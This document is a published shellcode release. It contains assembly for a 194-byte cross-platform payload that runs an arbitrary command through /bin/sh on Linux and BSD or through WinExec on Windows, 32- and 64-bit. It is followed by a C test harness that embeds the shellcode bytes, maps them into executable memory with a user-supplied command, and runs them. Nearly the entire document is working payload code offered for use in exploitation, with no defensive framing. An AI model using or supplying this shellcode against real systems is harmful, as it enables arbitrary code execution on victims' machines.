/** # Title : Execute command on Linux/Windows/BSD x86_64 execve("/bin//sh", {"//bin/sh", "-c", "cmd"}, NULL) shellcode # Date : 04-06-2016 # Author : @odzhancode # Tested On : Debian x86/x64, FreeBSD x64, OpenBSD x64, Windows x86, Windows x64 */ ; ************************************** ; exec.asm ; ; Execute a command ; Works on 32/64-bit versions of Windows and Linux, 64-bit versions of FreeBSD/OpenBSD ; ; yasm -fbin exec.asm -oexec.bin ; nasm -fbin exec.asm -oexec.bin ; ; 194 bytes ; bits 32 push esi push edi push ebx push ebp xor ecx, ecx ; ecx=0 mul ecx ; eax=0, edx=0 push eax push eax push eax push eax push eax ; setup homespace for win64 jmp l_sb ; load command get_os: pop edi ; edi=cmd, argv mov cl, 7 ; initialize cmd/argv regardless of OS push eax ; argv[3]=NULL; push edi ; argv[2]=cmd repnz scasb ; skip command line stosb ; zero terminate push edi ; argv[1]="-c", 0 scasw ; skip option stosb ; zero terminate push edi ; argv[0]="/bin//sh", 0 push esp ; save argv push edi ; save pointer to "/bin//sh", 0 mov al, 6 ; eax=sys_close for Linux/BSD inc ecx ; ignored on x64 jecxz gos_x64 ; if ecx==0 we're 64-bit ; we're 32-bit ; if gs is zero, we're native 32-bit windows mov cx, gs jecxz win_cmd ; if eax is zero after right shift of SP, ASSUME we're on windows push esp pop eax shr eax, 24 jz win_cmd ; we're 32-bit Linux mov al, 11 ; eax=sys_execve pop ebx ; ebx="/bin//sh", 0 pop ecx ; ecx=argv int 0x80 ; we're 64-bit, execute syscall and see what ; error returned gos_x64: push -1 pop edi syscall cmp al, 5 ; Access Violation indicates windows push 59 pop eax cdq jz win_cmd pop edi ; rdi="/bin//sh", 0 pop esi ; rsi=argv syscall l_sb: jmp ld_cmd ; following code is derived from Peter Ferrie's calc shellcode ; i've modified it to execute commands win_cmd: pop eax ; eax="/bin//sh", 0 pop eax ; eax=argv pop eax ; eax="/bin//sh", 0 pop eax ; eax="-c", 0 pop ecx ; ecx=cmd pop eax ; eax=0 inc eax xchg edx, eax jz x64 push eax ; will hide push ecx ; cmd mov esi, [fs:edx+2fh] mov esi, [esi+0ch] mov esi, [esi+0ch] lodsd mov esi, [eax] mov edi, [esi+18h] mov dl, 50h jmp lqe bits 64 x64: mov dl, 60h mov rsi, [gs:rdx] mov rsi, [rsi+18h] mov rsi, [rsi+10h] lodsq mov rsi, [rax] mov rdi, [rsi+30h] lqe: add edx, [rdi+3ch] mov ebx, [rdi+rdx+28h] mov esi, [rdi+rbx+20h] add rsi, rdi mov edx, [rdi+rbx+24h] fwe: movzx ebp, word [rdi+rdx] lea rdx, [rdx+2] lodsd cmp dword [rdi+rax], 'WinE' jne fwe mov esi, [rdi+rbx+1ch] add rsi, rdi mov esi, [rsi+rbp*4] add rdi, rsi cdq call rdi cmd_end: bits 32 pop eax pop eax pop eax pop eax pop eax pop ebp pop ebx pop edi pop esi ret ld_cmd: call get_os ; place command here ;db "notepad", 0xFF ; do not change anything below ;db "-c", 0xFF, "/bin//sh", 0 // *************** xcmd.c /** Copyright © 2016 Odzhan. All Rights Reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. 3. The name of the author may not be used to endorse or promote products derived from this software without specific prior written permission. THIS SOFTWARE IS PROVIDED BY AUTHORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */ #include #include #include #include #if defined (_WIN32) || defined(_WIN64) #define WIN #include #else #include #endif #define CMD_LEN_OFS 0x10+1 #define EXEC_SIZE 194 char exec[]= { /* 0000 */ "\x56" /* push esi */ /* 0001 */ "\x57" /* push edi */ /* 0002 */ "\x53" /* push ebx */ /* 0003 */ "\x55" /* push ebp */ /* 0004 */ "\x31\xc9" /* xor ecx, ecx */ /* 0006 */ "\xf7\xe1" /* mul ecx */ /* 0008 */ "\x50" /* push eax */ /* 0009 */ "\x50" /* push eax */ /* 000A */ "\x50" /* push eax */ /* 000B */ "\x50" /* push eax */ /* 000C */ "\x50" /* push eax */ /* 000D */ "\xeb\x37" /* jmp 0x46 */ /* 000F */ "\x5f" /* pop edi */ /* 0010 */ "\xb1\x00" /* mov cl, 0x0 */ /* 0012 */ "\x50" /* push eax */ /* 0013 */ "\x57" /* push edi */ /* 0014 */ "\xf2\xae" /* repne scasb */ /* 0016 */ "\xaa" /* stosb */ /* 0017 */ "\x57" /* push edi */ /* 0018 */ "\x66\xaf" /* scasw */ /* 001A */ "\xaa" /* stosb */ /* 001B */ "\x57" /* push edi */ /* 001C */ "\x54" /* push esp */ /* 001D */ "\x57" /* push edi */ /* 001E */ "\xb0\x06" /* mov al, 0x6 */ /* 0020 */ "\x41" /* inc ecx */ /* 0021 */ "\xe3\x12" /* jecxz 0x35 */ /* 0023 */ "\x66\x8c\xe9" /* mov cx, gs */ /* 0026 */ "\xe3\x20" /* jecxz 0x48 */ /* 0028 */ "\x54" /* push esp */ /* 0029 */ "\x58" /* pop eax */ /* 002A */ "\xc1\xe8\x18" /* shr eax, 0x18 */ /* 002D */ "\x74\x19" /* jz 0x48 */ /* 002F */ "\xb0\x0b" /* mov al, 0xb */ /* 0031 */ "\x5b" /* pop ebx */ /* 0032 */ "\x59" /* pop ecx */ /* 0033 */ "\xcd\x80" /* int 0x80 */ /* 0035 */ "\x6a\xff" /* push 0xffffffff */ /* 0037 */ "\x5f" /* pop edi */ /* 0038 */ "\x0f\x05" /* syscall */ /* 003A */ "\x3c\x05" /* cmp al, 0x5 */ /* 003C */ "\x6a\x3b" /* push 0x3b */ /* 003E */ "\x58" /* pop eax */ /* 003F */ "\x99" /* cdq */ /* 0040 */ "\x74\x06" /* jz 0x48 */ /* 0042 */ "\x5f" /* pop edi */ /* 0043 */ "\x5e" /* pop esi */ /* 0044 */ "\x0f\x05" /* syscall */ /* 0046 */ "\xeb\x75" /* jmp 0xbd */ /* 0048 */ "\x58" /* pop eax */ /* 0049 */ "\x58" /* pop eax */ /* 004A */ "\x58" /* pop eax */ /* 004B */ "\x58" /* pop eax */ /* 004C */ "\x59" /* pop ecx */ /* 004D */ "\x58" /* pop eax */ /* 004E */ "\x40" /* inc eax */ /* 004F */ "\x92" /* xchg edx, eax */ /* 0050 */ "\x74\x16" /* jz 0x68 */ /* 0052 */ "\x50" /* push eax */ /* 0053 */ "\x51" /* push ecx */ /* 0054 */ "\x64\x8b\x72\x2f" /* mov esi, [fs:edx+0x2f] */ /* 0058 */ "\x8b\x76\x0c" /* mov esi, [esi+0xc] */ /* 005B */ "\x8b\x76\x0c" /* mov esi, [esi+0xc] */ /* 005E */ "\xad" /* lodsd */ /* 005F */ "\x8b\x30" /* mov esi, [eax] */ /* 0061 */ "\x8b\x7e\x18" /* mov edi, [esi+0x18] */ /* 0064 */ "\xb2\x50" /* mov dl, 0x50 */ /* 0066 */ "\xeb\x17" /* jmp 0x7f */ /* 0068 */ "\xb2\x60" /* mov dl, 0x60 */ /* 006A */ "\x65\x48" /* dec eax */ /* 006C */ "\x8b\x32" /* mov esi, [edx] */ /* 006E */ "\x48" /* dec eax */ /* 006F */ "\x8b\x76\x18" /* mov esi, [esi+0x18] */ /* 0072 */ "\x48" /* dec eax */ /* 0073 */ "\x8b\x76\x10" /* mov esi, [esi+0x10] */ /* 0076 */ "\x48" /* dec eax */ /* 0077 */ "\xad" /* lodsd */ /* 0078 */ "\x48" /* dec eax */ /* 0079 */ "\x8b\x30" /* mov esi, [eax] */ /* 007B */ "\x48" /* dec eax */ /* 007C */ "\x8b\x7e\x30" /* mov edi, [esi+0x30] */ /* 007F */ "\x03\x57\x3c" /* add edx, [edi+0x3c] */ /* 0082 */ "\x8b\x5c\x17\x28" /* mov ebx, [edi+edx+0x28] */ /* 0086 */ "\x8b\x74\x1f\x20" /* mov esi, [edi+ebx+0x20] */ /* 008A */ "\x48" /* dec eax */ /* 008B */ "\x01\xfe" /* add esi, edi */ /* 008D */ "\x8b\x54\x1f\x24" /* mov edx, [edi+ebx+0x24] */ /* 0091 */ "\x0f\xb7\x2c\x17" /* movzx ebp, word [edi+edx] */ /* 0095 */ "\x48" /* dec eax */ /* 0096 */ "\x8d\x52\x02" /* lea edx, [edx+0x2] */ /* 0099 */ "\xad" /* lodsd */ /* 009A */ "\x81\x3c\x07\x57\x69\x6e\x45" /* cmp dword [edi+eax], 0x456e6957 */ /* 00A1 */ "\x75\xee" /* jnz 0x91 */ /* 00A3 */ "\x8b\x74\x1f\x1c" /* mov esi, [edi+ebx+0x1c] */ /* 00A7 */ "\x48" /* dec eax */ /* 00A8 */ "\x01\xfe" /* add esi, edi */ /* 00AA */ "\x8b\x34\xae" /* mov esi, [esi+ebp*4] */ /* 00AD */ "\x48" /* dec eax */ /* 00AE */ "\x01\xf7" /* add edi, esi */ /* 00B0 */ "\x99" /* cdq */ /* 00B1 */ "\xff\xd7" /* call edi */ /* 00B3 */ "\x58" /* pop eax */ /* 00B4 */ "\x58" /* pop eax */ /* 00B5 */ "\x58" /* pop eax */ /* 00B6 */ "\x58" /* pop eax */ /* 00B7 */ "\x58" /* pop eax */ /* 00B8 */ "\x5d" /* pop ebp */ /* 00B9 */ "\x5b" /* pop ebx */ /* 00BA */ "\x5f" /* pop edi */ /* 00BB */ "\x5e" /* pop esi */ /* 00BC */ "\xc3" /* ret */ /* 00BD */ "\xe8\x4d\xff\xff\xff" /* call 0xf */ }; // save code to binary file void bin2file (uint8_t bin[], size_t len) { FILE *out=fopen ("sh_cmd.bin", "wb"); if (out!=NULL) { fwrite (bin, 1, len, out); fclose (out); } } // allocate read/write and executable memory // copy data from code and execute void xcode(void *code, size_t code_len, char *cmd, size_t cmd_len) { void *bin; uint8_t *p; char args[]="\xFF-c\xFF/bin//sh\x00"; size_t arg_len; arg_len=strlen(args) + 1; printf ("[ executing code...\n"); #ifdef WIN bin=VirtualAlloc (0, code_len + cmd_len + arg_len, MEM_COMMIT, PAGE_EXECUTE_READWRITE); #else bin=mmap (0, code_len + cmd_len + arg_len, PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0); #endif if (bin!=NULL) { p=(uint8_t*)bin; memcpy (p, code, code_len); // set the cmd length p[CMD_LEN_OFS] = (uint8_t)cmd_len; // copy cmd memcpy ((void*)&p[code_len], cmd, cmd_len); // copy argv memcpy ((void*)&p[code_len+cmd_len], args, arg_len); //DebugBreak(); bin2file(bin, code_len+cmd_len+arg_len); // execute ((void(*)())bin)(); #ifdef WIN VirtualFree (bin, code_len+cmd_len+arg_len, MEM_RELEASE); #else munmap (bin, code_len+cmd_len+arg_len); #endif } } int main(int argc, char *argv[]) { size_t len; char *cmd; if (argc != 2) { printf ("\n usage: xcmd \n"); return 0; } cmd=argv[1]; len=strlen(cmd); if (len==0 || len>255) { printf ("\n invalid command length: %i (must be between 1 and 255)", len); return 0; } xcode(exec, EXEC_SIZE, cmd, len); return 0; }